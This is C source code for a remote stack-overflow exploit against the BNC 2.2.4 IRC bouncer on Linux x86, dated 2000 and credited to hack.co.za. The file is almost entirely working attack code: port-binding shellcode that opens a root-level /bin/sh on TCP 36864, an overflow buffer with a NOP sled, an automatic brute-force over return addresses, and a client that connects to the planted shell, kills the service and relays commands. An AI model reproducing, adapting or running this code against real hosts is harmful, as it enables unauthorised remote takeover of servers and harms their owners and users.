/*
 *  bncex.c - Linux x86 remote BNC 2.2.4 stack overflow 
 *  
 *  Notes:
 *  Because of the wide variations in offsets between typical vulnerable
 *  hosts, this code will brute-force the offset for you (within the range
 *  delineated by the MIN_ADDRESS and MAX_OFFSET #define's).
 *  
 *  Usage:
 *
 *  ./bnc bnc.server.com
 *      Uses a destination port of 6668 (bnc's default)
 *  ./bnc bnc.server.com 242
 *      Uses a destination port of 242
 *    
 *  anathema <anathema@hack.co.za>
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define DEFAULT_BNC_PORT		6668
#define MIN_ADDRESS			0xbffff450
#define MAX_OFFSET			0x950
#define STEP				100
#define RETPOS				1036
#define BD_PRT				36864
#define DELAY				2

char c0de[] = /* portshell shellcode, 128 bytes (tcp/36864) */
  "\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89\x46\x08\x8d"
  "\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29"
  "\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d"
  "\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89"
  "\x56\x10\xb0\x66\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd"
  "\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b"
  "\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";

u_long
resolve_host(u_char *host_name)
{
  struct in_addr addr;
  struct hostent *host_ent;

  if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
      host_ent = gethostbyname(host_name);
      if (!host_ent) return((u_long)0);
      memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
    }

  return(addr.s_addr);
}

void
backdoor_connect(u_long dst_ip)
{
  struct sockaddr_in sin;
  u_char tmp[8192] = {0};
  fd_set fds;
  int sock;

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (sock == -1)
    {
      perror("socket allocation");
      exit(-1);
    }

  sin.sin_family = AF_INET;
  sin.sin_port   = htons(BD_PRT);
  sin.sin_addr.s_addr = dst_ip;

  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1)
    {
      if (errno == ECONNREFUSED) return;
      perror("connect");
      exit(-1);
    }

  fprintf(stderr, "[1mowned![0m\n\n");

  write(sock, "killall -9 bnc; cd /; uname -a; id;\n", 36);
  for (;;)
    {
      FD_ZERO(&fds);
      FD_SET(0, &fds);
      FD_SET(sock, &fds);

      if ((select(0xff, &fds, NULL, NULL, NULL)) == -1)
        {
          perror("select");
          exit(-1);
        }

      memset(tmp, 0, sizeof(tmp));

      if (FD_ISSET(sock, &fds))
        {
          if (recv(sock, tmp, sizeof(tmp) - 1, 0) == -1)
            {
              fprintf(stderr, "Connection closed by foreign host.\n");
              close(sock);
              exit(0);
            }

          fprintf(stderr, "%s", tmp);
        }

      if (FD_ISSET(0, &fds))
        {
          read(0, tmp, sizeof(tmp)-1);
          write(sock, tmp, strlen(tmp));
        }
    }

  /* NOTREACHED */
}

void
exploit(u_long dst_ip, u_short dst_prt, u_long addr)
{
  struct sockaddr_in sin;
  u_char buf[4096] = {0};
  int ret = RETPOS, i = 0, sock;

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (sock == -1)
    {
      perror("\nsocket allocation");
      exit(-1);
    }

  sin.sin_family = AF_INET;
  sin.sin_port   = htons(dst_prt);
  sin.sin_addr.s_addr = dst_ip;

  if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
    {
      perror("failed ");
      exit(-1);
    }

  memset(buf, 0x90, ret - strlen(c0de));
  memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de));

  buf[ret++] = (addr & 0xff);
  buf[ret++] = (addr >> 8) & 0xff;
  buf[ret++] = (addr >> 16) & 0xff;
  buf[ret++] = (addr >> 24) & 0xff;

  if (write(sock, buf, strlen(buf)) != strlen(buf))
    {
      fprintf(stderr, "\nerr: truncated write()\n");
      exit(-1);
    }

  fprintf(stderr, "[32mwaiting[0m.. ");
  sleep(DELAY);

  close(sock);
  backdoor_connect(dst_ip);
  fprintf(stderr, "[32mno.[0m\n");
}

int
main(int argc, char **argv)
{
  u_long  dst_ip  = 0;
  u_long  addr    = 0;
  u_short dst_prt = DEFAULT_BNC_PORT;
  u_int   offset  = 0;
  u_int   i = 0;

  fprintf(stderr, "[31mBNC automated brute-forcing exploit code\n"
          "[32mCopyright (c) anathema <anathema@hack.co.za>[0m\n");

  if (argc != 2 && argc != 3)
    {
      fprintf(stderr, "\nusage:\t%s dst_host|ip [dst_prt]\n", argv[0]);
      exit(-1);
    }

  dst_ip = resolve_host(argv[1]);
  if (argc > 2) dst_prt = (u_short)atoi(argv[2]);
  if (!dst_ip)
    {
      fprintf(stderr, "What kind of address is this: `%s`\n", argv[1]);
      exit(-1);
    }

  fprintf(stderr, "[31m\nBruteforcing from [1m0x%lx to 0x%lx[0m[31m "
          "step %d[0m\n", MIN_ADDRESS, MIN_ADDRESS + MAX_OFFSET, STEP);

  for (i = 0; i < MAX_OFFSET; i += STEP)
    {
      addr = MIN_ADDRESS + i;

      fprintf(stderr, "[32mAttempting to exploit with address"
              "[1m 0x%lx[0m.. ", addr);
      exploit(dst_ip, dst_prt, addr);
    }

  fprintf(stderr, "\nCouldn't exploit host `%s`.\n", argv[1]);
  exit(0);
}


/*                    www.hack.co.za              [2000]*/